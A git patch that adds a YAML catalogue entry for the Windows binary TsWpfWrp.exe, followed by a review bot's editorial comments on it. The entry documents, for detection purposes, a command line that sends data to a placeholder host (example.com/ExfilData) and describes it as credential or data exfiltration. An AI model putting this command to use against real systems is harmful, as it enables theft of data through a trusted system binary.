From 20ea9d337915cefe8f7191695f4214794e1578d8 Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Thu, 25 Apr 2024 14:05:30 +0300 Subject: [PATCH] Add files via upload --- yml/OSBinaries/TsWpfWrp.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 yml/OSBinaries/TsWpfWrp.yml diff --git a/yml/OSBinaries/TsWpfWrp.yml b/yml/OSBinaries/TsWpfWrp.yml new file mode 100644 index 0000000..a6786b5 --- /dev/null +++ b/yml/OSBinaries/TsWpfWrp.yml @@ -0,0 +1,24 @@ +--- +Name: TsWpfWrp.exe +Description: Windows Presentation Foundation Terminal Server Print Wrapper +Author: Avihay Eldad +Created: 2024-04-25 +Commands: + - Command: TsWpfWrp.exe http://example.com/ExfilData blabla + Description: Upload file, credentials or data exfiltration in general + Usecase: Exfilitrate data to remote server + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows +Full_Path: + - Path: C:\Windows\System32\TsWpfWrp.exe + - Path: C:\Windows\SysWOW64\TsWpfWrp.exe +Detection: + - IOC: TsWpfWrp making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' + - Person: Sagi Dinar + Handle: '@DinarSagi' + \ No newline at end of file
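Review bot: the `Commands` entry does not explain its two arguments, so the line `Command: TsWpfWrp.exe http://example.com/ExfilData blabla` cannot be reproduced or turned into a detection as written. State whether the data travels in the URL or in the second argument, and replace `blabla` with a named placeholder whose meaning the `Description` spells out. The `Description` "Upload file, credentials or data exfiltration in general" is too broad for the same reason; describe what the binary actually sends and over which request. In `Usecase`, "Exfilitrate" should read "Exfiltrate". The `Detection` block carries only a free-text IOC; a reference for the behaviour and a concrete detection (for example, process name plus outbound connection from either `Full_Path`) would let a defender act on the entry. The file ends with a whitespace-only line and no trailing newline; drop the blank line and terminate the file with a newline. The subject "Add files via upload" should name the binary being added.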